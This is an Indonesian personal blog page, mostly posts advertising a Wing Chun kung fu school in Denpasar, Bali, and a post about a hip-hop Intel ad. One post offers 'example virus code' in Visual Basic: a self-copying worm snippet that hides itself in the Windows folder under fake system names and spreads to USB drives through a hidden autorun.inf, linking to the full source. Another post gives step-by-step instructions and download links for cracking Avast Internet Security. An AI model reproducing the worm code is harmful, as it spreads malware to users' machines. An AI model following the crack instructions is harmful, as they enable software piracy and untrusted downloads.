titel.

WIZZEND CErEATION (BAYU WISNAWA) STIKOM BALI ALWAYS THE FIRTS

Wizzend Creation

Nama lengkap: I Putu Gede Bayu Wisnawa (Wizzend) Alamat : Jl.Seroja no 40 Denpasar,Tonja,Br SENGGUAN. Hobi : Futsal dengan teman-teman!! (HARAT F.C) HP : 081916548404 JANGAN LUPA ADD MY FACEBOOK (www.wizzend@yahoo.com)

Senin, 05 Mei 2014

Wing Chun Journey Bali, Indonesia

Jumat, 30 November 2012

wing chun bali

 “You must know the source of the water from which you drink.”
-Ip Man-
 
 Wing Chun Grand Master, Si Tai Gung Yip Man

            Siapa yang tidak mengenal sang legenda Ip man pada gambar di bawah ini? film ip man yang di peran kan oleh aktor Donnie Yen sanagt lah luar biasa. Mungkin anda sempat menonton filemnya tetapi disini saya tidak lah membahas atau mempromosikan filemnya! tetapi saya akan mengenalkan anda bahwa beladiri kungfu dari sakte wingchun china selatan ini sudah ada di indonesia sejak th 2000-an, di bali wing chun masihlah terdengar awam di dunia seni bela diri.

Kami membuka perguruan beladiri Wing Chun aliran Ip man yg diturunkan oleh Ip -man ke 2 orang anak yaitu Ip Ching dan Ip Chun dan berlabuh ke GrandMaster Samuel Kwok
                                                            Donnie yen like Ip man
                                                                      Ip Man(Yip Man)

                                                                GrandMaster Samuel Kwok(Kiri)
Siapakah GrandMaster Samuel Kwok?
GrandMaster Samuel Kwok (Baju hitam) adalah orang yang berdiri di samping Sifu saya yaitu (Sifu Adrian). Pada saat itu penyerahan sertifikat seminar Traditional Wing Chun Ip Man di Jakarta beberapa waktu yang lalu. GrandMaster Samuel Kwok sendiri adalah murid dari kedua anak dari Ip Man. Samuel Kwok sendiri setelah beberapa tahun belajar dari kedua anaknya Ip Man, beliau mengajar wing chun dan menyebarkan Wing Chun aliran Ip Man ke berbagai negara.Sampai sekarang pengalaman mengajar beliau sudah lebih dari 40 tahun.
 

                                              Logo Perguruan Wing Chun Bali aliran Ip-man
                                                         Jl.Gunung agung no 99 denpasar




Latihan boneka kayu




Salam Wing-chun Bali
Saya sudah belajar wing chun aliran Ip man di perguruan surya dewata denpasar sejak tahun 2011, manfaat yang saya dapatkan selama ini sangat lah banyak, salahsatunya:
- kepercayaan diri yang tinggi
-refleksi tubuh yang cepat
-Meningkatkan tingkat kesadaran yang lebih tinggi
-Mengurangi Stress dan tekana akibat beban pikiran
-Memiliki tubuh yang sehat dan mental yang kuat
-Meningkatkankepercayaan diri
-meningkatkan gerakan tangan dan kaki yang lebih reflex/sensitif
-meningkatkan relaksasi dan ketenangan hati dalam bermeditasi lewat seni bela diri
-meningkatkan signal wireless defense pada tubuh sehingga saya bisa lebih sigap dan cepat mengantisipasi serangan fisik secara mendadak.

demikian manfaat yg saya dapatkan dalam berlatih ilmu beladiri wing-chun aliran ipman
Terimakasih salam wing-chun bali untuk Indonesia __/\__



Penyerahan sertifikan oleh Sifu enos wing chun semarang

Latihan Boneka kayu


suasana latihan di perguruan wing chun bali




Latihan Chi-Sao bersama sifu Ardhi wing chun bali


Mini trening perguruan surya dewata





latihan wing chun @Royal gym gatsu di denpasar




and...

 lokasi terbaru. 
Ving Tsun Surya Dewata Denpasar-Bali

Dewata GYM, jl tukad musi IV no. 2



jurus 2 Ving Tsun ( Chum Kiu )

video


sparing 
video





Sekilas wing chun>>>>>>


                                                              Ip-Man And Brucelee
Wing Chun adalah
 sebuah bentuk seni bela diri yang sangat unik, spesialisasi pada pertarungan jarak dekat, memakai pukulan cepat dan tendangan dengan pertahanan yang ketat serta ketangkasan gerak kaki untuk mempercepat gerak maju. Wing Chun yang efektif dapat dicapai dengan kordinasi antara serangan dan pertahanan yang serentak dan serangan balik. Dari hal tersebut Wing Chun menjadi suatu ilmu bela diri yang baik dalam hal pertahanan diri. Seorang murid harus belajar untuk mengantarkan jumlah energi yang tepat dengan keadaan santai. Guru Wing Chun yang baik akan mengajarkan muridnya untuk mengatasi keadaan dengan mengatur posisi dan mengelak daripada menghadapi langsung. Gaya Wing Chun meliputi tendangan, menangkis, serangan beruntun, tinju, menjebak dan mengontrol teknik sebagai bagian dari pertarungan itu sendiri.

Di Kelas baru! :)
DIBUKA PELATIHAN WINGCHUN DI DENPASAR - BALI
alamat Jl.Gatot subroto IV, denpasar Royal Gym  (di belakang Pizza gatsu )

Mohon doa restu dari berbagai kalangan, baik peminat, praktisi, penonton dan lain-lain.
Segera di buka pelatihan wushu dan wing chun untuk umum, materi khusus untuk pemula di denpasar - bali. Syarat dan ketentuan adalah;
- Minimal SD kelas 3,
- Mau berdisiplin diri dalam berlatih (serius)
- Sehat lahir dan batin, sehat badan dan mental stabil
- Berpakaian rapi dan sopan

Pelatihan dimulai Januari 2012, Untuk informasi lebih lanjut mengenai jadwal dan biaya pelatihan harap hubungi 0361.8019869
Tempat terbatas!!
Semoga bermanfaat! Salam  wing chun!

ALAMAT WING CHUN BALI YANG BARU 

Dewata GYM, jl tukad musi IV no. 2


artikel wing chun surya dewata
-http://surya-dewata.blogspot.com/
-https://www.facebook.com/WushuWingChunDenpasarBali
-https://twitter.com/Surya_dewata

Sekilas Tentang Ilmu Wing Chun Surya Dewata
video 


join @FBPerguruan wing chun surya dewata @Facebook


------------------------------------------------------------------------------------------------------------

TELAH TERBIT! Buku Wing Chun “Teknik dan Kunci Dasar Wing Chun Tradisional Ip Man”.
Buku Wing Chun pertama dan satu-satunya dalam bahasa Indonesia, karya asli anak bangsa yang menekuni bela diri Wing Chun melalui silsilah Wing Chun Tradisional Ip Man. Ditulis berdasarkan pengalaman latihan dan penjelasan langsung dari GM. Samuel Kwok yang merupakan murid langsung dari Ip Chung dan Ip Chin (keduanya anak kandung Grandmaster Ip Man).
Buku wing chun ini wajib dimiliki oleh semua pemerhati dan pecinta wing chun, karena memberikan penjelasan secara gamblang tentang Wing Chun Tradisional Ip Man yang sesungguhnya sehingga dapat menjawab semua kebingungan mengenai rahasia wing chun Ip Man.
Materi buku wing chun ini berisi tentang penjelasan mengenai teknik dasar wing chun (wing chun technique) dan kunci dasar wing chun tradisional Ip Man untuk menjawab kebingungan orang selama ini mengenai rahasia wing chun, dilengkapi juga dengan filosofi dan substansi dari setiap gerakan-gerakan dasar yang selama ini sulit ditemui referensinya, serta dilengkapi form Siu Lim Tao.
Buku wing chun ini bisa dibeli di Perguruan Wing Chun Surya Dewata dengan menghubungi 0361.8019869 atau 081.731.5125




alamat : Dewata GYM, jl tukad musi IV no. 2




Artikel lengkap Bisa klik >>> Perguruan surya dewata


Senin, 04 Juni 2012

CONTOH coding buat virus dlam visual basic



Public Class Explorer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
On Error Resume Next
ShowInTaskbar = False
Dim fs, virus, flashdrive, tf, atr, rg, sys32
Dim flashdrive1 As String
Dim winpath As String
fs = CreateObject("Scripting.FileSystemObject")
winpath = fs.getspecialfolder(0).path & "\ssms.exe"
virus = Application.ExecutablePath
sys32 = fs.getspecialfolder(0).path & "\csrs.exe"
My.Computer.FileSystem.CopyFile(virus, winpath, True)
My.Computer.FileSystem.CopyFile(virus, sys32, True)
tf = fs.getfile(winpath)
tf.attributes = 39
tf = fs.getfile(sys32)
tf.attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.path <> "A:" Then
flashdrive1 = flashdrive.path & "\perawan.exe"
My.Computer.FileSystem.CopyFile(virus, flashdrive1, True)
tf = fs.getfile(flashdrive.path & "\perawan.exe")
tf.attributes = 39
atr = "[autorun]" & vbCrLf & "open=perawan.exe" & vbCrLf & "shell\open\command=perawan.exe" & vbCrLf & "action=Open folder to view files" & vbCrLf & "shell\Explore\command=perawan.exe"
tf = fs.createtextfile(flashdrive.path & "\autorun.inf", True)
tf.write(atr)
tf = fs.getfile(flashdrive.path & "\autorun.inf")
tf.attributes = 39
End If
Dim ss As Object
Dim obj As Object
ss = CreateObject("wscript.shell")

Untuk selengkapnya kunjungi ling aslinya ya

http://xphreaktechnospot.blogspot.com/2010/12/ne-contoh-virus-dengan-visual-basic.html


Dibuka latihan Internak wingchun kungfu system di denpasar. bali. Untuk kelas umum dan private. Dibimbing oleh pelatih berpengalaman dan profesional. Hubungi:0817315125 Surya Dwata kungfu school alamat jl.Gunung agung denpasar nomer 99 sebelah selatan jalan!


Untuk lebih detai mengenai kungfu wingchun silakan berkunjung ke ling di bawah ini terima kasih
http://www.surya-dewata.blogspot.com/

Senin, 07 November 2011

IKLAN INTEL INSIDE CORE i5


Posted by adhy_christian on 22:18
Jogja Hip Hop Foundation (JHF) adalah salah satu grup hip hop populer yang berasal dari Yogyakarta. Salah satu ciri khas JHF adalah lirik-lirik berbahasa Jawa. Grup yang satu ini juga selalu mengenakan kemeja batik di setiap konsernya. Di bulan Mei lalu JHF berhasil menampilkan hip hop Jawa di New York, kota sakral bagi para pecinta hip hop. JHF pun mulai dikenal publik tanah air karena berani berbeda dengan mengkolaborasikan budaya tradisional Jawa dengan musik modern.


Kabar terbaru dari JHF adalah kerjasama mereka dengan Intel Indonesia dalam iklan terbaru Intel Indonesia dengan tagline Visibly Smart. Versi lengkap iklannya sudah bisa disaksikan di YouTube sejak tanggal 14 Oktober. Video berdurasi hampir 6 menit itu menceritakan JHF secara singkat hingga saat ini.

pengen dengerinn lagunya????????
langsung saja download dizini, , ,DOWNLOAD FREE , ,slamat menikmati, , , ,
Categories: Musik

Kamis, 01 September 2011

Free Download Avast ! Internet Security 6 Plus Crack ( Valid Sampai 2050 )



Lagi-lagi avast. Yup...avast ringan digunakan sih. Tapi fiturnya lengkap, smart, update database nya otomatis. Itu yang bikin avast gimana gitu...hahahahaa...Ini crack yang disediain disini bikin avast ! internet security 6 valid sampai tahun 2050. Ajib..lumayan lama kan. Bagi yang sudah menggunakan avast!  antivirus silakan di uninstall dulu pake avast removal yang ada di paket crack disini ya kalo mo beralih ke avast ! internet security 6.

Dah tau kan ya cara pake avast removalnya? Yoai...ekstrak dulu file cracknya, cari avast removalnya, restart  pc trus masuk ke safe mode ( tekan F8 pada saat booting ), trus jalanin deh avast removalnya. Kalo udah restart lagi pc jalanin avast ! internet security 6 trial yang udah di download dari situs resminya dibawah ya. Pilih bahasa klik next, hilangkan tanda centang pada " Participate In The Avast Community " n beri centang pada " Custom Installation ". Lanjut klik next. Pilih lokasi instalasi klik next. Configure klik next. Tunggu proses selesai trus restart. 
Abis itu masuk ke safe mode lagi. Copy " ashBase.dll " yang ada di folder crack  di tempat anda naruh installan avast ! internet security tadi. Defaultnya sih di C:\Program Files\Avast Software\Avast. Tunggu proses selesai lanjut restart pc. Eng ing eng...jadi deh avast ! internet security 6 nya valid sampe tahun 2050. Silakan update deh engine ma virus definitionnya, tapi jangan di update programnya. Kalo di update ya silakan diulangi pake cracknya lagi, tetep bisa valid mpe 2050 kok. Oke dah...

Download Avast ! Internet Security 6  http://www.avast.com/download-thank-you.php?src=http://files.avast.com/iavs5x/setup_ais.exe&product=IS&page=download-trial&locale=en-ww&avast=0
Download Crack Avast !lhttp://www.enterupload.com/mlsy8r2ldo92/_AVASTIS6Untill2050.rar.html

*Update :
Untuk crack sudah tidak bisa digunakan lagi, alternatif lain menggunakan license key yang bisa bikin avast internet security valid sampe 16 April 2013. Masih work license key nya, silakan klik link download :

http://www.ziddu.com/download/13857758/Avast-5.1.864-Key.rar.html

jangan lupa di SKIP AD ya

Pada saat install silakan langsung masukkan license key nya, ga usah install yang trial ya. Udah dicoba sampe sekarang masih work...

Kamis, 11 Agustus 2011

stikom my campus